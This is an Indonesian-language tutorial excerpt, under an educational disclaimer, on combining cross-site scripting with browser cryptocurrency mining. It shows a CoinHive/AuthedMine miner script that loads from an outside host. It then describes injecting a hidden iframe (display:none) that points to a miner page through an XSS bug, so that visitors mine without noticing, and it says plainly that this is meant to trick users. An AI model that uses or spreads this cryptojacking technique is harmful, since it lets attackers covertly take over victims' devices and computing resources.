DISCLAIMER
Setiap sesi didalam Mini Assembly bertujuan untuk pendidikan. Jika didalamnya terdapat konten "offensive" dimaksudkan agar kita mengetahui hal-hal tersebut sebagai persiapan untuk "defensive" atau sekedar sebagai pengguna agar lebih berhati-hati dalam berinternet"
Jadi bukan berinternet sehat, tapi berinternet cerdas. ^_^
Jika kita mengaitkan web mining dengan xss, berarti berkaitan dengan script yang singkat untuk melakukan mining.
Penggalan topik dari Sesi 4
Berikut ini contoh script miner yang bisa kita sisipkan di halaman website kita:
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR_SITE_KEY', {throttle: 0.3});
// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
miner.start();
}
</script>
kode seperti ini tentu saja tidak efektif untuk memanfaatkan sebuah bugs XSS. Jadi cara yang paling mudah untuk memanfaatkan bugs xss adalah dengan menyisipkan website yang sudah tertanam script mining. contoh tags-tags yang bisa digunakan seperti <embed>, iframe, atau <object> dll. Hanya saja, tags-tags tersebut akan menampilkan halaman web kita. Untuk mengelabuhi user, kita bisa menambahkan style css kedalam element diatas.
iframe src="ALAMAT_URL_MINER" style="display:none"
Dengan css sederhana ini, web kita tidak akan ditampilkan, tapi script mining tetap berjalan dibelakang layar.